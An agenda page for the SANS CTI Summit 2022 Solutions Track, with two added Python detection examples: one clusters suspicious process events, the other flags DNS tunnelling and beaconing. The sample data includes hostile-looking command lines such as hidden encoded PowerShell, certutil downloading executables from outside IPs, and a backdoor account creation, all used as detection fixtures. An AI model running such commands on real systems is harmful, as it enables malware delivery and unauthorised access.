Cyber Threat Intelligence Summit Solutions Track 2022

FREE SANS Cyber Threat Intelligence Summit | Jan 27th & 28th | Live Online

Chair & Subject Matter Expert: Ismael Valenzuela

Threat Intelligence can be defined as the ‘Art of Taking the Adversary by Surprise’. Yes, anticipating and mitigating surprises in the form of cyberattacks is the primary mission of a practical threat intelligence program. Achieving that goal requires a proactive approach, one that provides answers to critical questions like:

  • What threat actors are most likely to cause an impact in my organization?
  • What are their motivation, goals, and capabilities?
  • How do they behave and what arsenal of cyber-weapons (malicious software) is available to them to achieve those goals?
  • And more importantly, are you ready to defend against them? How can we communicate, share, and translate this knowledge into actionable countermeasures that result in improving an organization’s cyber defense capabilities?

>>> Checkout the other talks by registering for the SANS Cyber Threat Intelligence Summit and Bonus Session!

>>> Stay up to date on upcoming Summits & Forums and get connected with thousands of industry professionals by joining the 2022 Solutions Forums Workspace & Mailing List!

Download a copy of the presentations here!


Attendee Information

At this year’s Cyber Threat Intelligence Summit, you’ll have the chance to learn, connect, and share with thousands of cybersecurity professionals in attendance from around the globe. No matter your background or skill level, you’ll walk away from CTI Summit with interesting perspectives and case studies that challenge CTI assumptions and result in a shift in your understanding.

Continuing Professional Education (CPE) Credits are earned by participation in the event!

  • 6 CPEs are earned each day you attend the CTI Summit
  • 6 CPEs are earned for attending the CTI Solutions Track on Jan 28th
  • 1 CPE is earned for attending the CTI Bonus Session on Jan 27th

The Threat Intelligence Bonus Session will be a technical session covering specific advances in adversary profiling, a view of the sophistication of the techniques being used, and an example of how advanced threat intelligence can combat this modern threat.

Agenda | Friday, January 28, 2022 | 10:00 AM - 5:30 PM EST



10:00 AM

Welcome & Opening Remarks

Ismael Valenzuela, SANS Senior Instructor

10:15 AM

Threat Hunting by Clustering Big Data

There is a limit to the amount of information that humans can process. Even the most sophisticated organizations may struggle with the sheer amount of data generated from modern security systems – hence the need for tools and techniques to transform the vast amount of data into manageable information for human consumption. As an example, we’d like to walk through using "big data" analysis tools (Apache Spark) and techniques, while threat hunting, to group large amounts of suspicious events for human analysis. This technique may be useful to organizations of all sizes to handle large amounts of different data efficiently, or it could inspire some ideas to improve existing tools.

Tiago Pereira, Technical Leader, Security Research, Cisco Talos
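The grouping idea in the abstract above, as an added example that is not part of the talk or of Cisco Talos code: suspicious process events are collapsed into normalized command-line templates, and the (much smaller) set of templates is then single-linkage clustered on token-set Jaccard similarity so an analyst reads a handful of groups instead of every event. The events, host names, placeholders and the 0.6 similarity threshold are all constructed for illustration; in Apache Spark the same two passes map to a map/reduceByKey over templates followed by clustering the reduced set.

```python
"""
Cluster a stream of suspicious process events into a few groups for triage.
Illustrative code written for this page (not from the Cisco Talos talk).

  1. normalise each command line into a template (numbers, GUIDs, IPs,
     user names, encoded payloads become placeholders)
  2. exact-match templates collapse many events into few templates
  3. single-linkage clustering on token-set Jaccard similarity merges
     near-duplicate templates into groups an analyst can read
"""
import re
from collections import defaultdict

# Constructed sample events: (host, command line).
EVENTS = [
    ("ws01", "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAA="),
    ("ws02", "powershell.exe -nop -w hidden -EncodedCommand dwBoAG8AYQBtAGkA"),
    ("ws03", "powershell.exe -NoP -W Hidden -EncodedCommand aQBwAGMAbwBuAGYAaQBnAA=="),
    ("ws04", "certutil.exe -urlcache -split -f http://203.0.113.7/a.exe "
             "C:\\Users\\bob\\AppData\\Local\\Temp\\1234.exe"),
    ("ws05", "certutil.exe -urlcache -split -f http://203.0.113.9/b.exe "
             "C:\\Users\\alice\\AppData\\Local\\Temp\\9981.exe"),
    ("srv01", "rundll32.exe C:\\Windows\\Temp\\{6f2a1c3e-5b4d-4e8f-9a0b-1c2d3e4f5a6b}.dll,Start"),
    ("srv02", "rundll32.exe C:\\Windows\\Temp\\{b8c1d2e3-4f50-4a6b-8c7d-9e0f1a2b3c4d}.dll,Start"),
    ("ws06", "net user backupsvc P@ssw0rd1 /add"),
]

# Normalisation rules, applied in order to the lower-cased command line.
# Placeholders deliberately contain no digits so the final \d+ rule leaves them alone.
_RULES = [
    (re.compile(r"\{[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}\}"), "<GUID>"),
    (re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"), "<IP>"),
    (re.compile(r"\\users\\[^\\]+\\"), r"\\users\\<USER>\\"),
    (re.compile(r"(-enc|-encodedcommand)\s+\S+"), r"\1 <ENC>"),
    (re.compile(r"\b[0-9a-f]{32,}\b"), "<HASH>"),
    (re.compile(r"\d+"), "<N>"),
]


def normalize(cmdline: str) -> str:
    """Turn a concrete command line into its template."""
    t = cmdline.lower()
    for pat, repl in _RULES:
        t = pat.sub(repl, t)
    return " ".join(t.split())


def jaccard(a: set, b: set) -> float:
    return len(a & b) / len(a | b) if (a | b) else 0.0


def cluster_events(events, threshold: float = 0.6):
    """Return clusters (largest first), each with its templates and hosts."""
    by_template = defaultdict(list)          # step 1+2: the parallelisable pass
    for host, cmd in events:
        by_template[normalize(cmd)].append(host)
    templates = sorted(by_template)
    tokens = {t: set(t.split()) for t in templates}

    parent = {t: t for t in templates}       # step 3: union-find over templates

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for i, a in enumerate(templates):
        for b in templates[i + 1:]:
            if jaccard(tokens[a], tokens[b]) >= threshold:
                parent[find(a)] = find(b)

    groups = defaultdict(list)
    for t in templates:
        groups[find(t)].append(t)

    clusters = []
    for members in groups.values():
        hosts = sorted(h for t in members for h in by_template[t])
        clusters.append({
            "representative": max(members, key=lambda t: len(by_template[t])),
            "templates": sorted(members),
            "count": len(hosts),
            "hosts": hosts,
        })
    clusters.sort(key=lambda c: (-c["count"], c["representative"]))
    return clusters


if __name__ == "__main__":
    for c in cluster_events(EVENTS):
        print(f"{c['count']:>3} events  {c['representative']}  hosts={c['hosts']}")
```

Eight events become four clusters: the three encoded PowerShell launches share one template, the two certutil downloads differ only in the fetched file name and are merged by Jaccard similarity, the two rundll32 loads share a template once the GUIDs are masked, and the account creation stands alone.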

10:50 AM

Five Lessons for Integrating OT Threat Intelligence

Using and integrating threat intelligence is difficult. Integrating threat intelligence from a non-standard domain like OT/ICS is even harder. Sergio Caltagirone will discuss 5 lessons from his 20 years’ experience consuming and producing threat intelligence as well as advising 100s of intel customers to make their cybersecurity mission better and faster than before. This is not the “best practices” you’ve seen before but 5 pragmatic lessons forged in real cybersecurity challenges around the world.

Sergio Caltagirone, VP of Threat Intelligence, Dragos, Inc.

11:25 AM


11:40 AM

How to Shift from Static to Enriched Dynamic Threat Intelligence to STOP Ransomware

Ransomware attacks are escalating, occurring every eleven seconds with ransoms averaging almost $2M and remediation costs exceeding $4M. To combat these attacks, security professionals rely on threat intelligence feeds from a variety of sources. This information is often combined with a threat intelligence platform (TIP) or similar solution to correlate and analyze the latest information, evaluate security defenses and strategies, and prioritize actions to mitigate risks. Unfortunately, most intelligence feeds provide static Indicators of Compromise (IOCs) that are no longer adequate against today’s sophisticated attacks. A new technology has emerged called Moving Target Defense (MTD) that provides enriched dynamic threat intelligence to improve your ability to prevent ransomware attacks before they cause severe damage. By attending this solutions track, you will learn:

• How static analysis and typical hash, domain, and URL intelligence are now far less relevant
• Why static IOC feeds fail to provide analysts with actionable intel against tailored moving target attacks
• Why dynamic runtime threat feeds are required to determine which applications to scan and when
• What is MTD and how it generates byte patterns that provide dynamic threat intelligence to prevent ransomware attacks

Nadav Lorber, Security Research Team Leader, Morphisec
Bill Reed, Director, Morphisec

12:15 PM

Software Supply Chain Threats and the Adversary’s Attack Lifecycle

The purpose of this presentation is to bring to light the ever-present nature of software supply chain vulnerabilities through the review of three use cases: Log4j, the MS Exchange hacks, and Sunburst. In addition to reviewing these use cases, this presentation will apply each of these use cases within a framework that is designed to help defenders better understand the adversary’s ability to leverage software supply chain attacks as part of their larger attack lifecycle.

Jason Rivera, Director – Strategic Threat Advisory Group, Global, CrowdStrike

12:50 PM


1:00 PM

Tales from the Trenches

To be resilient against today’s cybersecurity threats, you need to be able to stay ahead of the attackers. Utilizing strategic threat intelligence to understand the adversaries allows organizations to make informed changes to people, processes, technology, and governance that strengthen their security posture and mitigate the damage from potential attackers.

With our threat intelligence, incident response, and product development teams working together, Palo Alto Networks sees attacks from a unique perspective. During this session, Jen will share an inside view of the latest cyber threats and how the attack groups we track are impacting the current cybersecurity landscape.

Jen Miller-Osborn, Deputy Director of Threat Intelligence, Unit 42, Palo Alto Networks

1:35 PM

Five Ways to Expel Ransomware Before they Spring the Trap

Ransomware has evolved and time may not be on your side. Once inside, adversaries are acting faster, moving laterally to accumulate enough data to ensure that you will pay—but intruders following the ransomware playbook have needs that cause them to risk detection. Every time they take a step, you have an opportunity to regain the advantage—if you know what to look for. Intrusions are a terrifying thing to consider, but they don’t spell doom: Visibility and response inside the perimeter are your best hope to prevent crippling damage from the ransomware menace. In this demo-filled session, we’ll show you how to spot indicators that leave modern ransomware exposed, giving you the opportunity to shut down the extortionists before they do real damage:

  •  Enumerating targets in your environment 
  •  Moving laterally toward your valuables 
  •  Escalating domain privileges inside encrypted channels 
  •  Phoning home over noisy DNS 
  •  Staging data exfiltration for second-phase extortion

Don Shin, Sr. Manager, ExtraHop
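One of the indicators listed above, "phoning home over noisy DNS", as an added example that is not part of the talk or of ExtraHop's detection logic: over a constructed DNS query log it flags an internal host that sends many unique, high-entropy subdomains to one registered domain (tunnelling or staged exfiltration) and/or queries it on a fixed interval (beaconing). Host names, domains, timestamps and the thresholds (six unique labels, 3.0 bits mean entropy, 20% interval variation) are assumptions chosen for the sample; the registered-domain split is deliberately naive and noted as such in the code.

```python
"""
Flag hosts phoning home over DNS: many unique high-entropy subdomains to one
registered domain (tunnel/exfil) and/or fixed-interval queries (beacon).
Illustrative code written for this page; the log lines are constructed.
"""
import math
from collections import defaultdict
from statistics import mean, pstdev

T0 = 1643384400.0  # constructed base timestamp, epoch seconds

# Constructed DNS log: (timestamp, source host, query name).
DNS_LOG = (
    # ws07: one query per minute, each with a random-looking 16-hex label
    [(T0 + 60 * i, "ws07", f"{label}.c2-updates.example") for i, label in enumerate([
        "0f3a9c6e1b7d2485", "7e2b9d04c1a6f835", "a91c4e7f0b3d6285",
        "3d8f1a5c9e0b7246", "c6e2a07b4f19d385", "5b0e8c3a1f7d2964",
        "e47a2d9c0b6f1835", "18f5c3e7a9b0d246",
    ])]
    # ws08: ordinary browsing of example.com at irregular times
    + [(T0 + dt, "ws08", q) for dt, q in [
        (5, "www.example.com"), (17, "www.example.com"), (300, "mail.example.com"),
        (301, "www.example.com"), (900, "cdn.example.com")]]
    # ws09: many unique but low-entropy (CDN-style) labels, irregular times
    + [(T0 + dt, "ws09", f"a{i}.cdn.example.net")
       for i, dt in enumerate([0, 3, 40, 41, 42, 200, 260, 700], start=1)]
)


def shannon_entropy(s: str) -> float:
    """Bits per character; 16 distinct hex chars give 4.0, 'aaaa' gives 0.0."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Naive (subdomain, registered-domain) split on the last two labels.
    Production code should use the Public Suffix List so 'x.co.uk' works."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 3:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def analyze(dns_log, min_unique=6, min_entropy=3.0, min_queries=6, max_cv=0.2):
    """Return [(src, domain, reasons)] for every (src, domain) pair that looks
    like a tunnel (unique, high-entropy labels) and/or a beacon (regular gaps)."""
    groups = defaultdict(list)
    for ts, src, qname in dns_log:
        sub, dom = split_name(qname)
        groups[(src, dom)].append((ts, sub))

    findings = []
    for (src, dom), rows in sorted(groups.items()):
        rows.sort()
        uniq = {sub for _, sub in rows}
        ent = mean(shannon_entropy(s.replace(".", "")) for s in uniq)
        reasons = []
        if len(uniq) >= min_unique and ent >= min_entropy:
            reasons.append("tunnel")
        if len(rows) >= min_queries:
            gaps = [b[0] - a[0] for a, b in zip(rows, rows[1:])]
            # coefficient of variation near 0 means a fixed query interval
            if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_cv:
                reasons.append("beacon")
        if reasons:
            findings.append((src, dom, reasons))
    return findings


if __name__ == "__main__":
    for src, dom, reasons in analyze(DNS_LOG):
        print(f"{src} -> {dom}: {', '.join(reasons)}")
```

Only ws07 is reported, for both reasons. ws09 shows why the entropy test matters: it also sends eight unique labels to one domain, but "a1"…"a8" carry little entropy and the timing is irregular, so it stays quiet.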

2:10 PM


2:20 PM

Hi-Fi CTI : Latest Methods for Using High Fidelity CTI to Head-off Ransomware Attacks

The plague of ransomware continued to grow in 2021 with attacks on oil pipelines, payroll systems, managed service provider software, and reports indicating there were over 700 million attempted ransomware attacks. The resulting costs to businesses and the time lost by security and IT teams was higher than ever before. Ransomware is too sophisticated and too diverse to succumb to any “silver bullet” security solution or tactic. To stand up to ransomware groups, therefore, it is essential that organizations develop an in-depth understanding of a ransomware group’s tooling, capabilities, and behaviors leading up to, during and after a ransomware infection. Cyber Threat Intelligence tradecraft is uniquely positioned to aid organizations to accomplish that. 

 Join this session to learn how you can leverage Threat Intelligence in your TIP or SOAR platform to reduce the time to detection of malware infections and potentially head off ransomware attacks. We'll be covering topics such as: 

  • Why CTI leads to better Ransomware preparation
  • Understanding the Ransomware Lifecycle 
  • High Profile Cases w/ Common Attack Regressions 
  • The Do's and Don'ts - Operationalizing CTI using TIP & SOAR

Ali N. Khan, Solution Demand Manager Threat Intelligence, ReversingLabs

2:55 PM

Log4j: Separating the Exploits from the Noise

Attackers have already found thousands of potential ways to obfuscate their log4j attacks, which are sweeping the Internet at breakneck speed. SOCs protecting still-vulnerable assets have a duty to chase down every alert for it that pops up - which are coming in at a rate of tens or hundreds of thousands of times a day for larger enterprises. This talk will discuss how a data-driven strategy can automate that insurmountable task into a process that quickly reveals systems that actually responded to the attack - letting teams focus on the alerts that matter the most.

Alex Kirk, Global Principal Engineer, Corelight

3:30 PM

Operationalizing Threat Intelligence to Automate Threat Response

Deltas between the threat intelligence and SecOps functions as part of the broader cybersecurity team are real.

 More than half of security practitioners state that cross-team collaboration is a strain for them to be effective in their jobs, while 76% report they don’t have the access to the data they need - this creates silos.

The movement toward an intelligence-driven security organization will take a seismic shift in thinking to where intelligence is considered THE fundamental component of their cyber programs; where focused collaboration produces the most critical insights; and hyper-automation is applied to streamline threat response at-scale. 

Despite enormous strides last year in this area of cybersecurity, organizations still struggle to: 

  • Curate the right threat intelligence that matters most to their business
  • Correlate intelligence with other signals for an optimized threat response
  • Share the intelligence and insights in an efficient way to funnel into action

This presentation will articulate a clear strategy that organizations can implement, designed to up-level the use of intelligence to power threat response and bridge the gaps between threat intelligence and SecOps. Experts will walk through core use cases using a maturity-based model and will provide a technical demo for attendees.
Neal Dennis, Threat Intelligence Specialist, Cyware
Thomas Bain, Vice President, Cyware

4:05 PM


4:15 PM

Top Use Cases for Integrating Threat Intelligence with SOAR

Join Siemplify's Senior Solutions Architect, Harrison Parker, to learn strategies to help overcome challenges facing security professionals and why integrating threat intelligence and SOAR is critical for an effective SecOps strategy. In this session, you will learn the basics and benefits of SOAR + TIP and the top 4 use cases, and we will finish with a demo.

Harrison Parker, Senior Solutions Architect, Siemplify

4:50 PM

Key Functionalities of a Modern Cyber Threat Intelligence Program

Everyone knows security is overloaded work-wise – not everyone understands what that means. Cyber Threat Intelligence (CTI) is typically very technical, so how can you convince the teams setting business objectives and allocating resources (for budget) of what the cybersecurity priorities should be? A modern CTI program needs to show value to the business because it will help solve some of the major problems we’re seeing in TI programs today (such as lack of resources or lack of data). Part of this includes bridging the gap between threat and risk to ensure your operational strategy aligns with the overall business objectives. This session is going to help you identify how to move your CTI program into one that shows the business value of what you’re doing already today!

Jerry Caponera, VP Cyber Risk Strategy, ThreatConnect, Inc.

5:25 PM

Wrap-Up and Closing Remarks

Ismael Valenzuela, SANS Senior Instructor